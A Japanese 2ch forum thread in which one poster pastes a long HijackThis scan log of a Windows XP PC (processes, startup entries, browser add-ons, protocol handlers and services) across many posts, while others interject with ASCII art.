72 名前:66 [2005/07/30(土) 22:40:36 ID:vQUTlBEV] Logfile of HijackThis v1.99.1 Scan saved at 22:37:41, on 2005/07/30 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\acs.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\WINDOWS\system32\nmftskss.exe C:\WINDOWS\system32\NTMETER.EXE C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\system32\svchost.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe
73 名前:66 [2005/07/30(土) 22:41:18 ID:vQUTlBEV] C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe c:\Windows\System32\asrv.exe C:\WINDOWS\system32\FUSCli.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\system32\rundll32.exe C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe C:\Program Files\Analog Devices\SoundMAX\Smax4.exe C:\WINDOWS\system32\igfxtray.exe C:\WINDOWS\system32\hkcmd.exe C:\Program Files\NEC\SmartVision\SVUPnPMn.exe C:\Program Files\NEC\SmartVision\SvSche.exe C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe C:\Program Files\MediaGarage\MGSplash.exe C:\Program Files\MediaGarage\MGAutoPlay.exe C:\Program Files\Java\jre1.5.0\bin\jusched.exe C:\Program Files\FaUserSW\NMUWATCH.EXE C:\Program Files\Java\jre1.5.0\bin\jucheck.exe C:\Program Files\SmartHobby\AutoDnP.exe C:\Program Files\nectvrc\tvrc.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\NECMFK\necmfk.exe C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE C:\Program Files\Real\RealPlayer\RealPlay.exe C:\Program Files\Softnavi\SNaviBTN.exe C:\Program Files\MSN Messenger\msnmsgr.exe C:\Program Files\tora3\2chtubo\tubo\_2chtubo.exe C:\Program Files\unDonut\unDonut.exe
74 名前:66 [2005/07/30(土) 22:42:09 ID:vQUTlBEV] C:\PROGRA~1\TRENDM~1\VIRUSB~1\PCCMAIN.EXE C:\PROGRA~1\TRENDM~1\VIRUSB~1\PccVScan.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\TSC.EXE C:\Documents and Settings\YUKI-1\デスクトップ\HijackThis\HijackThis.exe O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O3 - Toolbar: BIGLOBEツールバー - {DD7EDCBC-F49A-4008-AA47-74D852489985} - C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\LiquidSurf\sybil.dll O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file) O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe O4 - HKLM\..\Run: [SHRunOnce] C:\Program Files\SmartHobby\SHRunOnce.exe O4 - HKLM\..\Run: [SVUPnPManager] C:\Program Files\NEC\SmartVision\SVUPnPMn.exe O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe O4 - HKLM\..\Run: [dms_helper] "C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe"
75 名前:66 [2005/07/30(土) 22:43:21 ID:vQUTlBEV] O4 - HKLM\..\Run: [MGSplash] C:\Program Files\MediaGarage\MGSplash.exe O4 - HKLM\..\Run: [MGAutoPlay] C:\Program Files\MediaGarage\MGAutoPlay.exe O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\Downlo~1\CnsMin.dll,Rundll32 O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0\bin\jusched.exe O4 - HKLM\..\Run: [FaUserSW] C:\Program Files\FaUserSW\NMUWATCH.EXE O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32 O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC O4 - HKLM\..\Run: [NECTVRC] C:\Program Files\nectvrc\tvrc.exe O4 - HKLM\..\Run: [NECMFK] C:\Program Files\NECMFK\necmfk.exe O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe" O4 - HKLM\..\Run: [LVCOMS] C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE O4 - HKLM\..\Run: [LogitechGalleryRepair] C:\Program Files\Logitech\ImageStudio\ISStart.exe O4 - HKLM\..\Run: [LogitechImageStudioTray] C:\Program Files\Logitech\ImageStudio\LogiTray.exe O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [121ポップリンク] "C:\Program Files\GTAgent\AUAgent.exe" /startup O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [LDM] C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BackWeb-8876480.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
76 名前:66 [2005/07/30(土) 22:43:57 ID:vQUTlBEV] O8 - Extra context menu item: ニュース検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_news.htm O8 - Extra context menu item: ページ検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_web.htm O8 - Extra context menu item: 画像をマイ ピクチャへ上書き保存 - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/SCRIPT_URL.htm O8 - Extra context menu item: 画像検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_pict.htm O8 - Extra context menu item: 辞書検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_dic.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing) O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O11 - Options group: [!CNS] JWord (日本語キーワード)
77 名前:66 [2005/07/30(土) 22:44:40 ID:vQUTlBEV] O14 - IERESET.INF: START_PAGE_URL=www.biglobe.ne.jp/index-pc.html O16 - DPF: {1D7EBFD0-78EF-4A9F-BB1C-AF4762E95E8E} (VGGLoadSi Control) - www.gogosi.jp/VGGLoadSi.cab O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab O16 - DPF: {2A7EFEAA-8059-4C69-8FE2-4BA999C3B102} (TrickCtrl Class) - https://ssl2.gcrest.com/trickster/cabs/TrickLauncher.cab O16 - DPF: {7623BE59-D4CF-4379-ABC4-B39E11854D66} (MabinogiWebAvatarRenderer Class) - avatar.mabinogi.jp/3drender/renderer/mabiweb_JP.2005.2.2.cab O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - messenger.msn.com/download/MsnMessengerSetupDownloader.cab O18 - Protocol: bw+0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw+0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw-0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw-0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw00 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw00s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw10 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw10s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
78 名前:66 [2005/07/30(土) 22:45:36 ID:vQUTlBEV] O18 - Protocol: bw20 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw20s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw30 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw30s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw40 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw40s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw50 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw50s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw60 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw60s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw70 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw70s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
79 名前:66 [2005/07/30(土) 22:46:14 ID:vQUTlBEV] O18 - Protocol: bw80 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw80s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw90 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw90s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwa0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwa0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwb0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwb0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwc0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwc0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwd0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwd0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwe0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
80 名前:66 [2005/07/30(土) 22:47:07 ID:vQUTlBEV] O18 - Protocol: bwe0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwf0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwf0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll O18 - Protocol: bwg0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwg0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwh0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwh0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwi0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwi0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwj0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwj0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
81 名前:66 [2005/07/30(土) 22:48:40 ID:vQUTlBEV] O18 - Protocol: bwk0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwk0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwl0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwl0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwm0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwm0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwn0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwn0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwo0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwo0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwp0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwp0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwq0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
82 名前:66 [2005/07/30(土) 22:49:27 ID:vQUTlBEV] O18 - Protocol: bwq0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwr0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwr0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bws0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bws0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwt0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwt0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwu0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwu0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwv0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwv0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bww0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bww0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
83 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 22:50:09 ID:???] .... ,-――――――-、 .. / __[|__ ヽ ,-´ ̄ ̄ ̄ ̄____ ̄ ̄ ̄ ̄`―、 . /,-――――i_|..[□ □]...|.i――――-、ヽ |_|.[リュンリュン ]|..|i-------i|.|[ 特.......急 ]|_| | |――――-|.||i―――i||.|.-────| | | | /| ||| .|||.| | | ___________ | | / | ||| |||.| ∩∩ | | / | | / | ||| |||.| | |_| | | | < リュンパッチ♪発進だよ! | | / | ||| |||.| ( ・∀・ ) | | \___________ | | / .| ||| |||.|¶⊂¶⊂ ) .| | | `ー-.--、_|..|||_____|||.|_,----―'´...| | ..||. ̄ ̄ ̄.||. .| | [二l二] ||. リュン♪.|| [二l二] | ..ヽ _ ||____|| _ ../ .ヽ_____|ニ二二ニ|_______/ ..|| / ̄ ̄|.|!|_{|=゚ロ|}_|!|.| ̄ ̄ヽ. || .. ヽ ̄ .|________| ... ̄/ ヽ___ヽ_______/____/
84 名前:66 [2005/07/30(土) 22:50:15 ID:vQUTlBEV] O18 - Protocol: bwx0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwx0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwy0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwy0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwz0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwz0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: msjwwdat - {BAAB02DC-913E-40AA-B9ED-8068DEE42CFA} - C:\Program Files\Microsoft Office\Home Style\JWW\JWWData.dll O18 - Protocol: offline-8876480 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll O20 - Winlogon Notify: Unimodem - C:\WINDOWS\system32\mwc42loc.dll O23 - Service: Atheros Configuration Service (ACS) - Unknown owner - C:\WINDOWS\system32\acs.exe O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing) O23 - Service: Family Channel Switch (Asrv) - Unknown owner - c:\Windows\System32\asrv.exe O23 - Service: B's Recorder GOLD Library Service (bgsvclib) - B.H.A Corporation - C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe O23 - Service: DiXiM Media Server - DigiOn - C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe
85 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 22:50:44 ID:???] 、、, , , , , , , / ̄ ̄ ̄ ̄\ 、/; ̄', ̄', ̄',\, ./ /フ ヽ 、/、` 、 ' ' , ' ", X / o~ _ ___ | ソ、゙ ` ' "| | / ゚ ヽ / ゚ ヽ | |゙ ゙ /⌒ヽ /⌒l | ,--、 `ー〜' `ー〜 / ,--、 ・ `ー' ・ / ( 6 i―┬┬┬┬i 〈 ( 6 i‐―┬―┬‐; 〈  ̄l \_,二_二ノ ノ  ̄l、 \ ,二二、ノ ノ _\_  ̄ ̄ ̄_,/ _\_  ̄ ̄ ̄_,/ ./ \ ̄7ヾ~~7 \ ./::::lll::/|~7ヾ~|ヽ::\ | /⌒ヽVl_lV /⌒ヽ |:::::::::lll::> Vl^lV<::|:::| |、 / ー'ー' / | | ー'ーf |:::::::::|::::::\ヾV/./::|::::| ヾニニニソ .| | |ニニソ |:::::::::|:::日:::\l/日:|::::|
86 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 22:51:34 ID:???] >>83 >>85 かわいそうだからじゃまするのやめてやれ
87 名前:66 [2005/07/30(土) 22:52:30 ID:vQUTlBEV] O23 - Service: MSCSPTISRV - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe O23 - Service: Register Task Helper (Nmftskss) - NEC Corporation - C:\WINDOWS\system32\nmftskss.exe O23 - Service: NT Meter - Unknown owner - C:\WINDOWS\system32\NTMETER.EXE O23 - Service: PACSPTISVR - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe O23 - Service: BroadPass Manager (Poling_Service) - 日本電気株式会社 - c:\Program Files\BIGLOBE\BroadPass\base\base.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - c:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro 